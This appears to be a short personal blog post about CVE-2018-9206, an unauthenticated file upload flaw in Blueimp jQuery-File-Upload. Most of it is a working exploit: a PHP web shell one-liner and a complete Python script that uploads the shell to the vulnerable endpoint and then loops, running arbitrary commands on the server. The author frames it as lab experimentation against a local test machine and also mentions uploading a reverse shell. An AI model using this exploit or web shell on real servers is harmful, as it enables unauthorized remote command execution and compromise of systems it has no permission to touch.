CVE-2018-9206:  Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0

Alternatively known as the "eight year zero day".  Lots of vulnerabilities going unnoticed although eight years seems like a bit much.

I found this vulnerable version, set it up on a server, and decided to play around with an automated version of:

<?php $cmd=$_GET['cmd']; system($cmd);?>

Exploit-DB has an exploit already but you can use curl -F to upload a shell with the above syntax.  You could push up a reverse shell as well but I got to thinking, what if I did a little bit of automation:


#!/usr/bin/python
import requests
# defining the host
host='http://192.168.90.34'
# defining our shell code
shell='<?php $cmd=$_GET["cmd"]; system($cmd);?>'
# writing the shell in our file system for upload
f=open("jqshell.php","w+")
f.write(shell)
f.close()
# defining the jquery path
url=host+'/jquery/server/php/index.php'
# posting the shell to the server
files = {'files': open('jqshell.php', 'rb')}
r = requests.post(url, files=files)
shellloc=host+'/jquery/server/php/files/jqshell.php?cmd='
# with our shell uploaded, I've created a loop for executing local system commands
while True:
    command=raw_input("command to execute: ")
    combined=shellloc+command
    r = requests.get(combined)
    print r.content


I've commented it well enough, I think.  Basically, I'm creating the cmd shell in my script, I'm uploading it, and then I'm looping the url so we can just type commands instead of the typical cmd.php?=xxx where xxx is the command.

For me, I learned a new trick -- curl -F basically acts like a user hitting the submit button on a form and the Python equivalent is the commented section "posting the shell to the server".